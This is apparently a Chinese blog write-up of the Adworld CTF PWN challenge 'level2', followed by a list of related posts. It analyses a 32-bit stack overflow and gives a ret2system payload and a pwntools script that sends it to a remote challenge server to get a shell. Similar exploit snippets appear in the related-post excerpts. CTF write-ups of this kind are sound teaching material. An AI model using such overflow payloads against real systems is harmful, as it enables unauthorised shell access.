攻防世界PWN-level2

最新推荐文章于 2024-09-23 20:53:41 发布
最新推荐文章于 2024-09-23 20:53:41 发布
阅读量888 收藏 9
点赞数 4
分类专栏: ctf 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/deeeelete/article/details/109681307
版权

题目:level2

在这里插入图片描述



开PE看信息,进checksec看详情

在这里插入图片描述
进checksec,查看到程序无PIE,堆栈不可执行,无栈保护

在这里插入图片描述
跑一遍逻辑,还是hello word

在这里插入图片描述



于是开32位IDA查看

f5main函数

在这里插入图片描述
看源码,主要就是echo了一个hello world,同时很明显上方有一个显眼的脆弱函数

在这里插入图片描述
双击进入脆弱函数查看

在这里插入图片描述
单独摘出源码

ssize_t vulnerable_function()
{
  char buf; // [sp+0h] [bp-88h]@1

  system("echo Input:");
  return read(0, &buf, 0x100u);
}

系统要求input输入内容,然后return了一个read操作,同时读了一个&buf,buf是0x100u个空间,猜测是要把这个buf打满然后让溢出的内容给read读到,双击&buf进去查看偏移

在这里插入图片描述在这里插入图片描述
单独摘出buf,s,r的十六进制地址

buf:00000088
s:  00000000
r:  00000004

简单计算一下总共偏移了88-0+4也就是0x88 + 0x04个地址能把buf堵死,然后能进入read操作,因此去IDA左侧的函数栏找一找有没有能直接执行系统命令的函数

回到main函数的图形界面,可以看到下面有一个system函数,f5反编译进去查看

在这里插入图片描述
发现该函数能够返回一个system权限

在这里插入图片描述
找到system函数的地址:0x08048320

在这里插入图片描述
但这只是system执行,而且从代码中可以看到system()中还要输入一个command,这个命令并没有办法直接输入,因此查看在源码中是否存在能cat flag的命令字符串,或者是能拿到bin/sh权限的字符串

打开左上角view窗口的open subviews -> Strings

在这里插入图片描述
找bin/sh的地址:0x0804A024

在这里插入图片描述
但同样要注意的是,32位程序在运行中栈的结构是:调用函数地址 -> 函数返回地址 -> 参数

尝试构造payload:'A'*0x88+'B'*0x04 先用来堵死buf的缓存,准确的说是0x88个字符堵死buf缓冲,然后剩下的0x04是ebp的地址,ebp就是基址指针寄存器(extended base pointer),其内存放着一个指针,该指针永远指向系统栈最上面一个栈帧的底部,对应着源码中的s,可以理解为start,作为了压栈的开始

在这里插入图片描述
继续往后拼接p32(0x08048320),该地址是试图给其read到一个system函数地址,p32构造是因为程序是32位

以上是调用函数地址的步骤。

接下来是函数的返回地址,而不是参数地址,已知main函数return 0,因此堵死这个0,可以直接p32(0)接上堵死,且0是8个节,也可以上p32(0x11111111),11111111可以是任意8个十六进制字堵死,以上作为函数返回值的操作入栈。

在这里插入图片描述
最后是拼接我们的bin/sh地址:p32(0x0804A024)

最终payload为:'A'*0x88+'B'*0x04 + p32(0x08048320) +p32(0) +p32(0x0804A024)




脚本:

from pwn import *
r = remote("220.249.52.133",48125)
payload = 'A'*0x88+'B'*0x04 + p32(0x08048320) +p32(0) +p32(0x0804A024)
r.sendline(payload)
r.interactive()

运行:

在这里插入图片描述

Deeeelete
关注
专栏目录
攻防世界(pwn篇)---level2
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-15 1581
攻防世界(pwn篇)—level2 文章目录攻防世界(pwn篇)---level2题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 运行分析 IDA 分析 ssize_t vulnerable_function() { char buf[136]; // [esp+0h] [ebp-88h] BYREF system("echo
攻防世界 - pwn - level2
qq726232111的博客
03-16 247
A、程序分析 1、使用了system() 2、read() -> 缓冲区溢出 3、 程序包含/bin/sh命令 B、利用分析 1、read(0,ebp-88h) --> payload ebp-88h --- ebp-1h (88hbyte 填充数据) ebp --- ebp+3h (4byte 填充...
攻防世界pwn level2
最新发布
2401_83086823的博客
09-23 333
想要溢出buf,就要0x88-0x00+0x04个字节,溢出部分为实现system函数,system(command)的command为/bin/sh,即可拿到shell.2.system返回值为四个字节,为了堆栈平衡,填上四个垃圾字符,再到/bin/sh地址。进入vulnerable_function(这个名字其实就给了提示)buf大小为0x88,read范围为0x100,存在溢出漏洞。查看字符串,看到了system,/bin/sh.1.buf溢出写入system地址。
攻防世界 Pwn level2
MrTreebook的博客
07-16 548
攻防世界pwn level2 1.file 和 checksec 先走一遍 是一个32位的文件 看到 RELRO的状态是 Partial 2.放进IDA32看一下 有一个system函数 进入vulnerable_function看一下 buf可以溢出 进入栈空间看看 136byte的buf再加上4byte的数据溢出返回system的地址 本题开始前就提示我们用ROP 现在去plt表上暴露system的地址 3.编写exp 先构造paylod system_plt = elf.plt["syst
攻防世界 pwn新手 level2
kwist_jay的博客
06-14 502
这里我们先下载附件,查看一下文件信息: 32位的i386程序,这里我们用IDA32打开,查看main函数的伪代码 顺藤摸瓜找到输入点buf: 这里我们查看buf的栈结构,他只用了0x88字节但是给了100字节的输入空间,明显的栈溢出 最后两位的返回值s是一个4字节的数组,r为程序返回的地址,就是我们要操作的东西 初步的payload可以定为 'a'*0x88+'aaaa'+..... 我们再往下看,做pwn一般就是找到system函数然后运行自己的命令,所以我们找到了_sy...
攻防世界_pwn_level2(萌新版)
TedLau的博客
02-24 2469
首发于鄙人博客:传送门 0x00 前言 32位,NX enabled 0x10 步骤 0x11 main函数 很明显我们需要去查看vulnerable函数。 0x12 vulnerable函数 在这里我们需要向题目中输入若干内容,又观察到buf的长度为0x88,那么我们便可以构造出0x88长度的无关数据,然后再输入4个长度的垃圾数据以覆盖ebp,然...
[攻防世界 pwn]——level2
Y_peak的博客
02-18 312
[攻防世界 pwn]——level2 题目地址: https://adworld.xctf.org.cn/ 题目: 32位程序 IDA中, 找到system和 ‘/bin/sh’ 地址进行覆盖 exploit from pwn import * p = remote("111.200.241.244",55083) system_addr = 0x0804845C binsh = 0x0804A024 payload = 'a' * (0x88 + 0x4) + p32(system_addr
攻防世界PWN新手题(PWN——level2)
0pt1mus
12-20 918
level2 转载自原创superj.site 0x00 首先通过file和checksec分析该题的附件。 判断该文件是32位的ELF文件,只开启了不可执行的保护。 0x01 开始进行反汇编,用IDA 32位。 通过左侧的函数窗口发现,只有main、vulnerable_function可用,因此进行分析,两个函数如下图: 通过分析发现,在main函数中首先调用vulnerable_fun...
攻防世界pwn pwn_level2
qq_44370676的博客
08-14 343
首先下下来的文件查壳以及查保护机制
攻防世界 Pwn level3
MrTreebook的博客
11-22 332
攻防世界pwn level31.checksec看一下保护2.IDA反汇编分析程序3.漏洞利用4.exp附上 1.checksec看一下保护 [*] '/home/ububtu/ctf/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 32位,开启NX保
攻防世界pwn——level3
qq_62076255的博客
11-05 711
攻防世界pwn——level3
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1438
学习pwn开始,慢慢来不要急
攻防世界pwn-level2】
a_silly_coder的博客
01-14 273
下载文件后,首先查看保护 将文件拖入ida 32位,发现函数名明示了攻击点 点进vulnerable_function函数后,发现buf距离ebp有0x88的距离,但是可以读入0x100的大小,确定这是一道栈溢出的题目,溢出点就在此处。 确定溢出点后,开始寻找利用方式,发现代码中给出了system函数,在0x8048320的位置 随后寻找sh或者bin_sh字符串: 此时要素齐全,开始编写脚本。 设计栈的结构为: 脚本为: 发送脚本,开始攻击: ...
攻防世界 pwn-100
10-26 325
1 题目 2 分析 如上图,这道题很简单粗暴,直接暴露溢出点,但是需要注意的是,每次输入读200!这点下面会有坑。 思路:利用ROP泄露出read的地址,利用Libsearch获得system和/bin/sh的地址。这些都是常规流程。但是,有一点要注意,在发送payload的时候,一定不能使用sendline或者sendafterline。因为这两个方法会自动在你的payload后面添加\n。本题严格读取200单元,多出来的\n作为下次读取的开头,会导致第二次发送的错误!exp如下 f
攻防世界pwn-level3】
a_silly_coder的博客
02-17 3309
下载文件后首先查看保护,发现可以进行栈溢出攻击 将文件拖入32位ida 进入vulnerable_function后,发现了read处有栈溢出漏洞 在查看代码后,发现没有提供system和bin/sh,但是由于给了libc,所以可以找到libc的偏移量,然后计算出system和bin/sh的加载地址。 对于plt表,got表,实际加载地址,我是这么理解的:通过elf.plt['write']获取到的是write在plt表中的地址1,这个地址1上存放的实际内容是write在got表的地..
攻防世界(pwn篇)---level0
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 1652
攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢
pwn 例题level2解析
m0_67423114的博客
04-26 531
下面就是寻找bin/sh了,由于题目较为基础,我们甚至能够直接在源代码中找到/bin/sh,利用它和main函数已存在的system函数,即可凑齐构造payload的全部材料。看开头英文变量以及观察末尾,可知Frame Size大小为0x88,Saved regs大小为0x04,即需要写0x88+0x04个填充后才能到达返回地址。可以看到存在一个缓冲区buf,并且大小为0x88,并且该函数返回了一个read函数,大小为0x100u,双击&buf变量具体查看。通过这种套路,确实获得了/bin/sh的地址!
【愚公系列】2022年01月 攻防世界-简单题-PWN-002(level2)
热门推荐
时光隧道
01-18 3万+
文章目录一、level2二、答题步骤1.获取在线场景2.查壳3.IDA总结 一、level2 题目链接:https://adworld.xctf.org.cn/task/task_list?type=pwn&number=2&grade=0 二、答题步骤 1.获取在线场景 2.查壳 对下载文件进行查壳,命令如下 file level2 checksec --file=level2 分析文件,小端程序(LSB),栈不可执行。 3.IDA 使用IDA对文件进行反汇编 第一步:首先找到ma
攻防世界 pwn 新手练习区 level2
ChaoYue_miku的博客
07-05 969
题目描述:菜鸡请教大神如何获得flag,大神告诉他‘使用面向返回的编程(ROP)就可以了’ ** 0、使用file命令查看文件类型,使用checksec查看保护情况,尝试打开文件 ** 32位ELF文件,开启了NX保护和部分地址随机化 (其实checksec就有包含了file的功能) ** 1、使用IDA32 Pro打开文件 ** 题目描述中有提示:面向返回的编程(ROP),所以就要寻找并构造ROP链。 首先查看main()函数 发现有一个vulnerable_function()函数,点进去看一下
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Deeeelete

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值